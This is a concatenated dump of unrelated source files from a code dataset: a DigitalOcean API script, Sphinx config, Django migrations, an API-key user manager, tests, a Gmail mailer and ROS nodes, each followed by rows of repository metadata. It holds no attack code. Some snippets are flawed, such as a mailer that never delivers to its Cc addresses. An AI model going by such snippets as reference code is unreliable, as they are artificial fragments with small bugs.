                    logging.debug("Throttler remove limits (threshold: %s) and release all waiting requests for activity %s, rse_id %s" % (threshold, activity, dest_rse_id))
                    rse_core.delete_rse_transfer_limits(rse=None, activity=activity, rse_id=dest_rse_id)
                    request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id)
                    rse_name = rse_core.get_rse_name(rse_id=dest_rse_id)
                    record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.%s.%s' % (activity, rse_name))
    except Exception:
        logging.warning("Failed to schedule requests, error: %s" % (traceback.format_exc()))
| 54.926625 | 223 | 0.537494 | 8,395 | 78,600 | 4.787135 | 0.060393 | 0.024759 | 0.01814 | 0.009306 | 0.64574 | 0.595576 | 0.540485 | 0.50214 | 0.481835 | 0.445183 | 0 | 0.006353 | 0.37117 | 78,600 | 1,430 | 224 | 54.965035 | 0.806741 | 0.065585 | 0 | 0.507042 | 0 | 0.004401 | 0.138667 | 0.018589 | 0 | 0 | 0 | 0.000699 | 0 | 0 | null | null | 0.00088 | 0.016725 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3830df09c72d6bc67a2ca0f6763f909dda7df0af | 574 | py | Python | list_images.py | mrowacz/digital_api_scripts | bc8758862a6fccc982c9e5ae05e6590e88dc9059 | [
"MIT"
] | null | null | null | list_images.py | mrowacz/digital_api_scripts | bc8758862a6fccc982c9e5ae05e6590e88dc9059 | [
"MIT"
] | null | null | null | list_images.py | mrowacz/digital_api_scripts | bc8758862a6fccc982c9e5ae05e6590e88dc9059 | [
"MIT"
] | null | null | null | import os
import json
import requests
url = "https://api.digitalocean.com/v2/images?per_page=999"
headers = {"Authorization" : "Bearer " + os.environ['DIGITALOCEAN_ACCESS_TOKEN']}
r = requests.get(url, headers=headers)
distros = {}
for entry in r.json()["images"]:
    s = "(" + str(entry["id"]) + ") " + entry["name"]
    if entry["distribution"] in distros:
        distros[entry["distribution"]].append(s)
    else:
        distros[entry["distribution"]] = [s]

for key in distros:
    print(key + ":")
    for list_elem in distros[key]:
        print("\t" + list_elem)
| 26.090909 | 81 | 0.634146 | 74 | 574 | 4.851351 | 0.527027 | 0.142061 | 0.133705 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008639 | 0.19338 | 574 | 21 | 82 | 27.333333 | 0.766739 | 0 | 0 | 0 | 0 | 0 | 0.261324 | 0.043554 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.176471 | null | null | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3837ed605953a3a84f61221e934440108abfdf2f | 2,790 | py | Python | docs/source/conf.py | ducouloa/ml4ir | 75aeecaff11682a7bd71c5521e59c449c43c3f9f | [
"Apache-2.0"
] | 70 | 2020-02-05T00:42:29.000Z | 2022-03-07T09:33:01.000Z | docs/source/conf.py | ducouloa/ml4ir | 75aeecaff11682a7bd71c5521e59c449c43c3f9f | [
"Apache-2.0"
] | 102 | 2020-01-31T21:12:55.000Z | 2022-03-28T17:04:43.000Z | docs/source/conf.py | ducouloa/ml4ir | 75aeecaff11682a7bd71c5521e59c449c43c3f9f | [
"Apache-2.0"
] | 23 | 2020-02-05T00:43:07.000Z | 2022-02-13T13:33:51.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from typing import List
from recommonmark.transform import AutoStructify
# Set python project root
sys.path.insert(0, os.path.abspath("../../python/"))
# The master toctree document
master_doc = "index"
# -- Project information -----------------------------------------------------
project = "ml4ir"
copyright = "2020, Search Relevance (Salesforce.com, Inc.)"
author = "Search Relevance (Salesforce.com, Inc.)"
# The full version, including alpha/beta/rc tags
release = "0.2.0"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions: List = [
    "sphinx.ext.autodoc",
    "sphinx.ext.coverage",
    "sphinx.ext.napoleon",
    "recommonmark",
]  # noqa: E501
# Add any paths that contain templates here, relative to this directory.
templates_path: List = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns: List = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme: str = "default"
# Title appended to <title> tag of individual pages
html_title: str = "ml4ir"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path: List = ["_static"]
# Overriding default theme with custom CSS for text wrapping bug on tables
html_context = {
    "css_files": ["_static/theme_overrides.css"],
}


def setup(app):
    app.add_config_value(
        "recommonmark_config", {"enable_eval_rst": True}, True
    )  # noqa E501
    app.add_transform(AutoStructify)
# Use both class definition doc and constructor doc for
# generating sphinx docs for python classes
autoclass_content = "both"
autodoc_member_order = "bysource"
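
# Added note: with "enable_eval_rst" switched on in setup() above, recommonmark's
# AutoStructify lets Markdown pages embed reStructuredText in fenced blocks,
# e.g. (hypothetical autoclass target):
#
#   ```eval_rst
#   .. autoclass:: ml4ir.SomeClass
#      :members:
#   ```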
| 32.44186 | 79 | 0.684946 | 367 | 2,790 | 5.13624 | 0.476839 | 0.02122 | 0.020159 | 0.029708 | 0.084881 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006783 | 0.15448 | 2,790 | 85 | 80 | 32.823529 | 0.792285 | 0.653405 | 0 | 0 | 0 | 0 | 0.312567 | 0.029001 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.032258 | false | 0 | 0.129032 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
383c4dbc8788963ff0f2227ca34717a2ddb9d2f7 | 334 | py | Python | backend/api/room/urls.py | jeraldlyh/HoloRPG | e835eb1f7a6b18c87007ecf8168d959b4e176a23 | [
"MIT"
] | null | null | null | backend/api/room/urls.py | jeraldlyh/HoloRPG | e835eb1f7a6b18c87007ecf8168d959b4e176a23 | [
"MIT"
] | null | null | null | backend/api/room/urls.py | jeraldlyh/HoloRPG | e835eb1f7a6b18c87007ecf8168d959b4e176a23 | [
"MIT"
] | null | null | null | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .views import DungeonViewSet, RoomViewSet
router = DefaultRouter()
router.register(r"dungeon", DungeonViewSet, basename="dungeon")
router.register(r"room", RoomViewSet, basename="room")
urlpatterns = [
path("", include(router.urls)),
] | 27.833333 | 63 | 0.775449 | 38 | 334 | 6.789474 | 0.526316 | 0.085271 | 0.116279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10479 | 334 | 12 | 64 | 27.833333 | 0.862876 | 0 | 0 | 0 | 0 | 0 | 0.065672 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
384212c693fe183ca43529aa8c41250ed2908324 | 656 | py | Python | hardhat/recipes/tkdiff.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/tkdiff.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/tkdiff.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | from .base import GnuRecipe


class TkDiffRecipe(GnuRecipe):
    def __init__(self, *args, **kwargs):
        super(TkDiffRecipe, self).__init__(*args, **kwargs)
        self.sha256 = '734bb417184c10072eb64e8d27424533' \
                      '8e41b7fdeff661b5ef30e89f3e3aa357'
        self.name = 'tkdiff'
        self.version = '4.2'
        self.depends = ['tcl', 'tk']
        self.url = 'https://downloads.sourceforge.net/project/tkdiff/tkdiff/' \
                   '$version/tkdiff-$version.tar.gz'
        self.install_args = ['cp', 'tkdiff', '%s/bin' % self.prefix_dir]

    # tkdiff ships as a plain Tcl/Tk script, so there is nothing to configure
    # or compile; installation simply copies the script (see install_args).
    def configure(self):
        pass

    def compile(self):
        pass
3847bfe54774d87addfadb9073d4d4d898715bfd | 1,552 | py | Python | steps/app/migrations/0006_auto_20180330_1816.py | VishalCR7/steps | 521e9317b0973795e9f2b98df9d41908ae95e042 | [
"Apache-2.0"
] | null | null | null | steps/app/migrations/0006_auto_20180330_1816.py | VishalCR7/steps | 521e9317b0973795e9f2b98df9d41908ae95e042 | [
"Apache-2.0"
] | null | null | null | steps/app/migrations/0006_auto_20180330_1816.py | VishalCR7/steps | 521e9317b0973795e9f2b98df9d41908ae95e042 | [
"Apache-2.0"
] | 3 | 2018-10-06T11:40:53.000Z | 2018-10-07T18:49:06.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-30 12:46
from __future__ import unicode_literals

from django.conf import settings
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('app', '0005_auto_20180330_1813'),
    ]

    operations = [
        migrations.AlterField(
            model_name='incubator',
            name='followers',
            field=models.ManyToManyField(blank=True, related_name='incubator_follows', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='incubator',
            name='incubated_startup',
            field=models.ManyToManyField(blank=True, related_name='incubators', through='app.IncubatorStartup', to='app.Startup'),
        ),
        migrations.AlterField(
            model_name='incubator',
            name='members',
            field=models.ManyToManyField(blank=True, related_name='incubator_members', through='app.IncubatorMember', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='incubator',
            name='ratings',
            field=models.ManyToManyField(blank=True, related_name='rated_incubators', through='app.IncubatorRating', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='startup',
            name='members',
            field=models.ManyToManyField(blank=True, related_name='startup_members', through='app.StartupMember', to=settings.AUTH_USER_MODEL),
        ),
    ]
| 36.952381 | 147 | 0.646907 | 156 | 1,552 | 6.237179 | 0.371795 | 0.080164 | 0.128469 | 0.149024 | 0.570401 | 0.546763 | 0.464543 | 0.36999 | 0.304214 | 0.133607 | 0 | 0.026981 | 0.235825 | 1,552 | 41 | 148 | 37.853659 | 0.793423 | 0.042526 | 0 | 0.470588 | 1 | 0 | 0.186784 | 0.015509 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
697365290d19012dbb2289c34b92ed5cceafd229 | 2,854 | py | Python | users.py | mavi0/onos-reroute-api | e3a155ce860a944563297c076e6ef4d8ac5a563e | [
"MIT"
] | null | null | null | users.py | mavi0/onos-reroute-api | e3a155ce860a944563297c076e6ef4d8ac5a563e | [
"MIT"
] | null | null | null | users.py | mavi0/onos-reroute-api | e3a155ce860a944563297c076e6ef4d8ac5a563e | [
"MIT"
] | null | null | null | import json, base64
import logging, coloredlogs
import hashlib, copy
from flask_table import Table, Col

logger = logging.getLogger(__name__)
coloredlogs.install(level='INFO')


class Users:
    def __init__(self):
        self.__users = self.__load_users("json/users.json")
        self.__generate_hash_keys()

    def __load_json(self, filename):
        with open(filename) as f:
            return json.load(f)

    def __load_users(self, config):
        try:
            config = self.__load_json(config)
        except Exception:
            logger.critical("Could not find configuration file: " + config)
        return config

    def __generate_hash_keys(self):
        for user in self.__users.get("users"):
            hashed = hashlib.sha256(user.get("api_key").encode())
            user["hashed_api_key"] = hashed.hexdigest()

    def get_key(self, username):
        for user in self.__users.get("users"):
            if user.get("username") == username:
                return user.get("api_key")
        return ""

    def get_user(self, key):
        for user in self.__users.get("users"):
            if user.get("api_key") == key:
                return user.get("username")
        return ""

    def get_hashed_key(self, username):
        for user in self.__users.get("users"):
            if user.get("username") == username:
                return user.get("hashed_api_key")
        return ""

    def authenticate(self, key):
        for user in self.__users.get("users"):
            if user.get("api_key") == key:
                return True
        return False

    def get_level(self, key):
        # Try to match the api_key
        for user in self.__users.get("users"):
            if user.get("api_key") == key:
                return user.get("level")
        # The username fallback below is disabled: matching on the username
        # alone would bypass authentication, so it is not safe.
        # for user in self.__users.get("users"):
        #     if user.get("username") == key:
        #         return user.get("level")
        return 0

    def get_users(self):
        users = copy.deepcopy(self.__users)
        for user in users.get("users"):
            del user["api_key"]
        return users

    def get_user_table(self):
        items = []
        for user in self.get_users().get("users"):
            items.append(Item(user.get("username"), user.get("level"), user.get("hashed_api_key")))
        table = ItemTable(items)
        return table.__html__()


# Declare the table layout
class ItemTable(Table):
    classes = ['table table-dark']
    name = Col('Username')
    level = Col('Level')
    hashed_pass = Col('Hashed API Key')


# Row objects for the table
class Item(object):
    def __init__(self, name, level, hashed_pass):
        self.name = name
        self.level = level
        self.hashed_pass = hashed_pass
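

# Usage sketch (added for illustration; assumes json/users.json holds entries of
# the form {"username": ..., "api_key": ..., "level": ...}):
#
#   users = Users()
#   if users.authenticate(key):
#       print(users.get_user(key), users.get_level(key))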
| 29.122449 | 99 | 0.575333 | 354 | 2,854 | 4.409605 | 0.231638 | 0.067265 | 0.05189 | 0.066624 | 0.297886 | 0.261371 | 0.261371 | 0.244715 | 0.244715 | 0.244715 | 0 | 0.003024 | 0.304835 | 2,854 | 97 | 100 | 29.42268 | 0.78377 | 0.084443 | 0 | 0.202899 | 0 | 0 | 0.100998 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0.043478 | 0.057971 | 0 | 0.536232 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
697cb4df0fee5fb2e4b8167c3cfa2dce9ba8fde7 | 3,564 | py | Python | tests/test_puls_util.py | xiaohan2012/capitalization-restoration-train | 24f9236a553ac91f4e291625e5616d8558f80d3e | [
"MIT"
] | 1 | 2020-03-07T01:25:21.000Z | 2020-03-07T01:25:21.000Z | tests/test_puls_util.py | xiaohan2012/capitalization-restoration-train | 24f9236a553ac91f4e291625e5616d8558f80d3e | [
"MIT"
] | null | null | null | tests/test_puls_util.py | xiaohan2012/capitalization-restoration-train | 24f9236a553ac91f4e291625e5616d8558f80d3e | [
"MIT"
] | null | null | null | import json
import os
import codecs

from capitalization_train.puls_util import (separate_title_from_body,
                                            extract_and_capitalize_headlines_from_corpus,
                                            get_input_example,
                                            get_doc_ids_from_file,
                                            convert_sentence_auxil_to_request)

from nose.tools import assert_equal

CURDIR = os.path.dirname(os.path.realpath(__file__))

with codecs.open(CURDIR + '/data/001BBB8BFFE6841FA498FCE88C43B63A.title.json') as f:
    title_sent = json.loads(f.read())

with codecs.open(CURDIR + '/data/001BBB8BFFE6841FA498FCE88C43B63A.title-cap.json') as f:
    cap_title_sent = json.loads(f.read())

with codecs.open(CURDIR + '/data/001BBB8BFFE6841FA498FCE88C43B63A.body.json') as f:
    body_sents = json.loads(f.read())


def test_separate_title_from_body():
    assert_equal.__self__.maxDiff = None
    rawpath = CURDIR + '/data/docs_okformed/001BBB8BFFE6841FA498FCE88C43B63A'
    title_sents, body_sents = separate_title_from_body(rawpath + ".auxil",
                                                       rawpath + ".paf")
    assert_equal(len(title_sents), 1)
    assert_equal(len(body_sents), 20)
    assert_equal(title_sents[0], title_sent)


def test_extract_and_capitalize_headlines_from_corpus():
    doc_ids = ['EEBADC60811702C931B0F6CB61CE9054',
               '4271571E96D5C726ECFDDDAACA74A264']
    corpus_dir = '/cs/fs/home/hxiao/code/capitalization_train/test_data/puls_format_raw/'
    result = list(extract_and_capitalize_headlines_from_corpus(
        corpus_dir, doc_ids)
    )
    print(result[0])
    assert_equal(len(result), 2)
    assert_equal(result[0][0], None)
    assert_equal(len(result[0][1][1]), 1)
    assert_equal(result[0][1][0], 'EEBADC60811702C931B0F6CB61CE9054')
    assert_equal(result[0][1][1],
                 [[u'Microsoft', u'Gives', u'New', u'Brand', u'Identity',
                   u'to', u'Nokia', u'Retail', u'Stores']])

    # Rewritten without the Python-2-only tuple-unpacking lambda:
    result1 = [item for item in result
               if item[1][0] == '4271571E96D5C726ECFDDDAACA74A264']
    assert_equal(len(result1[0][1][1]), 2)


def test_input_example():
    actual = get_input_example(
        CURDIR + '/data/docs_okformed/',
        CURDIR + '/data/docs_malformed/',
        '001BBB8BFFE6841FA498FCE88C43B63A'
    )
    print(cap_title_sent)
    expected = {"capitalizedSentences":
                [convert_sentence_auxil_to_request(
                    cap_title_sent)],
                "otherSentences": map(
                    convert_sentence_auxil_to_request,
                    body_sents)
                }
    print(expected)
    assert_equal(actual, expected)


def test_convert_sentence_auxil_to_request():
    sent_auxil = {"sentno": 0, "start": 51, "end": 128, "features": [{"lemma": "nanobiotix", "pos": "name_oov", "token": "Nanobiotix"}, {"lemma": "get", "pos": "tv", "token": "Gets"}, {"lemma": "early", "pos": "d", "token": "Early"}, {"lemma": "positive", "pos": "adj", "token": "Positive"}, {"lemma": "safety", "pos": "n", "token": "Safety"}, {"lemma": "result", "pos": "n", "token": "Results"}]}
    actual = convert_sentence_auxil_to_request(sent_auxil)
    expected = {'no': 0,
                'tokens': ['Nanobiotix', 'Gets', 'Early', 'Positive', 'Safety', 'Results'],
                'pos': ['name_oov', 'tv', 'd', 'adj', 'n', 'n']
                }
    assert_equal(actual, expected)


def test_get_doc_ids_from_file():
    ids = get_doc_ids_from_file(CURDIR + '/data/docids.txt')
    assert_equal(len(ids), 4)
| 40.044944 | 355 | 0.62486 | 404 | 3,564 | 5.207921 | 0.294554 | 0.073194 | 0.039924 | 0.052281 | 0.312262 | 0.228612 | 0.142586 | 0.075095 | 0.075095 | 0.075095 | 0 | 0.069835 | 0.232604 | 3,564 | 88 | 356 | 40.5 | 0.699452 | 0 | 0 | 0.028571 | 0 | 0 | 0.236532 | 0.127104 | 0 | 0 | 0 | 0 | 0.2 | 0 | null | null | 0 | 0.071429 | null | null | 0.042857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6982d7079fdcf3a58b79ac8ac6683d28485634e2 | 1,147 | py | Python | server/src/utils/mailer.py | ocskier/TutorDashboard | 4dedfee7676418660cca0043ee71db720f915cca | [
"Apache-2.0"
] | 1 | 2020-10-28T21:36:13.000Z | 2020-10-28T21:36:13.000Z | server/src/utils/mailer.py | ocskier/TutorDashboard | 4dedfee7676418660cca0043ee71db720f915cca | [
"Apache-2.0"
] | 36 | 2020-10-14T15:12:21.000Z | 2021-07-15T21:33:39.000Z | server/src/utils/mailer.py | ocskier/TutorDashboard | 4dedfee7676418660cca0043ee71db720f915cca | [
"Apache-2.0"
] | 1 | 2020-10-22T07:50:59.000Z | 2020-10-22T07:50:59.000Z | import smtplib, ssl, os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from .html_template import emailHtml
from .text_template import emailText

port = 465
context = ssl.create_default_context()


def sendEmail(emailData):
    adminUser = os.getenv("ADMIN_USERNAME")
    password = os.getenv("ADMIN_PASSWORD")
    sender = emailData["tutor"]
    receivers = emailData["recipient"]

    message = MIMEMultipart("alternative")
    message["Subject"] = "Tutor Confirmation"
    message["From"] = adminUser
    message["To"] = receivers
    # Header values must be strings, not tuples, so join the CC addresses:
    message["Cc"] = ", ".join([sender, "centraltutor@bcs.com"])

    text = emailText(emailData)
    html = emailHtml(emailData)
    part1 = MIMEText(text, "plain")
    part2 = MIMEText(html, "html")
    message.attach(part1)
    message.attach(part2)

    try:
        # NOTE: only 'receivers' is passed to sendmail(), so the addresses in
        # the Cc header are not actually delivered to unless added here.
        with smtplib.SMTP_SSL('smtp.gmail.com', port, context=context) as server:
            server.login(adminUser, password)
            server.sendmail(adminUser, receivers, message.as_string())
            print("Successfully sent email")
    except smtplib.SMTPException:
print("Error: unable to send email") | 29.410256 | 79 | 0.691369 | 128 | 1,147 | 6.132813 | 0.484375 | 0.02293 | 0.033121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007592 | 0.196164 | 1,147 | 39 | 80 | 29.410256 | 0.843818 | 0 | 0 | 0 | 0 | 0 | 0.155923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0.066667 | 0.166667 | 0 | 0.2 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6988900c33f8027bb264778efef7f83d1aa37d8a | 200 | py | Python | clancy_database/__init__.py | arthurian/visualizing_russian_tools | 65fd37839dc0650bb25d1f98904da5b79ae1a754 | [
"BSD-3-Clause"
] | 2 | 2020-07-10T14:17:03.000Z | 2020-11-17T09:18:26.000Z | clancy_database/__init__.py | eelegiap/visualizing_russian_tools | 9c36baebc384133c7c27d7a7c4e0cedc8cb84e74 | [
"BSD-3-Clause"
] | 13 | 2019-03-17T13:27:31.000Z | 2022-01-18T17:03:14.000Z | clancy_database/__init__.py | eelegiap/visualizing_russian_tools | 9c36baebc384133c7c27d7a7c4e0cedc8cb84e74 | [
"BSD-3-Clause"
] | 2 | 2019-10-19T16:37:44.000Z | 2020-06-22T13:30:20.000Z | # List of tables that should be routed to this app.
# Note that this is not intended to be a complete list of the available tables.
TABLE_NAMES = (
    'lemma',
    'inflection',
    'aspect_pair',
)
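

# Sketch of how a database router might consume this list (added illustration;
# the project's actual router is defined elsewhere):
#
#   class ClancyRouter:
#       def db_for_read(self, model, **hints):
#           if model._meta.db_table in TABLE_NAMES:
#               return "clancy_database"
#           return None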
| 25 | 79 | 0.69 | 31 | 200 | 4.387097 | 0.774194 | 0.088235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.23 | 200 | 7 | 80 | 28.571429 | 0.883117 | 0.635 | 0 | 0 | 0 | 0 | 0.371429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
699310c68f6ee0233724f50d1b8ed775e875d6af | 714 | py | Python | reflex/src/reflex/reflex_polling.py | EnricoSartori/reflex_ros_pkg | 960373a48a0d9095025763400a00c1b30fe4ede5 | [
"Apache-2.0"
] | null | null | null | reflex/src/reflex/reflex_polling.py | EnricoSartori/reflex_ros_pkg | 960373a48a0d9095025763400a00c1b30fe4ede5 | [
"Apache-2.0"
] | null | null | null | reflex/src/reflex/reflex_polling.py | EnricoSartori/reflex_ros_pkg | 960373a48a0d9095025763400a00c1b30fe4ede5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import rospy
from reflex_msgs.msg import HandCommand
from time import sleep
from reflex_base_services import *


class ReFlex_Polling(ReFlex):
    def __init__(self):
        super(ReFlex_Polling, self).__init__()

        def callback(data):
            # data is a HandCommand message
            self.move_finger(0, data.angles[0])
            self.move_finger(1, data.angles[1])
            #self.move_finger(2, data.angles[2])
        rospy.Subscriber("reflex_commander", HandCommand, callback)

        # spin: keep the node alive and polling for incoming messages
        rospy.spin()


if __name__ == '__main__':
    rospy.init_node('ReflexPollingNode')
    reflex_hand = ReFlex_Polling()
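
# Illustrative test publisher (added sketch; run from a separate node, and note
# that the exact length of 'angles' depends on the HandCommand message
# definition):
#
#   pub = rospy.Publisher('reflex_commander', HandCommand, queue_size=1)
#   cmd = HandCommand()
#   cmd.angles = [0.5, 0.5, 0.0]
#   pub.publish(cmd)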
| 25.5 | 67 | 0.658263 | 87 | 714 | 5.08046 | 0.517241 | 0.088235 | 0.095023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011111 | 0.243697 | 714 | 27 | 68 | 26.444444 | 0.807407 | 0.177871 | 0 | 0 | 0 | 0 | 0.070326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.266667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6998bcb96c84eee08055afeb394e0c10dfe55e4a | 248 | py | Python | test-crates/hello-world/check_installed/check_installed.py | pattonw/pyo3-pack | 675d92819faf56e972d1553ea8199425cb7f7e94 | [
"Apache-2.0",
"MIT"
] | null | null | null | test-crates/hello-world/check_installed/check_installed.py | pattonw/pyo3-pack | 675d92819faf56e972d1553ea8199425cb7f7e94 | [
"Apache-2.0",
"MIT"
] | null | null | null | test-crates/hello-world/check_installed/check_installed.py | pattonw/pyo3-pack | 675d92819faf56e972d1553ea8199425cb7f7e94 | [
"Apache-2.0",
"MIT"
] | null | null | null | from subprocess import check_output


def main():
    output = check_output(["hello-world"]).decode("utf-8").strip()
    if output != "Hello, world!":
        raise Exception(output)
    print("SUCCESS")


if __name__ == '__main__':
    main()
| 19.076923 | 66 | 0.633065 | 30 | 248 | 4.9 | 0.666667 | 0.14966 | 0.217687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005076 | 0.205645 | 248 | 12 | 67 | 20.666667 | 0.741117 | 0 | 0 | 0 | 0 | 0 | 0.177419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.25 | 0.125 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
699dbfba09e4b2780e57672a2d8ecc9e67db0fe3 | 702 | py | Python | resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 14423f1dec32af67f7203c8d4d36d0a9e2651802 | [
"MIT"
] | 28 | 2017-12-22T00:26:59.000Z | 2022-01-22T14:51:33.000Z | resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 14423f1dec32af67f7203c8d4d36d0a9e2651802 | [
"MIT"
] | 18 | 2018-03-06T19:04:20.000Z | 2022-03-21T15:06:30.000Z | resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 14423f1dec32af67f7203c8d4d36d0a9e2651802 | [
"MIT"
] | 28 | 2018-05-01T17:53:22.000Z | 2022-03-28T09:56:59.000Z | # (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
import pkg_resources

try:
    __version__ = pkg_resources.get_distribution(__name__).version
except pkg_resources.DistributionNotFound:
    __version__ = None

from .actions_component import ResilientComponent
from .action_message import ActionMessageBase, ActionMessage, \
    FunctionMessage, FunctionResult, FunctionError, \
    StatusMessage, BaseFunctionError
from .decorators import function, inbound_app, app_function, handler, required_field, required_action_field, defer, debounce
from .actions_test_component import SubmitTestAction, SubmitTestFunction, SubmitTestInboundApp
from .app_function_component import AppFunctionComponent
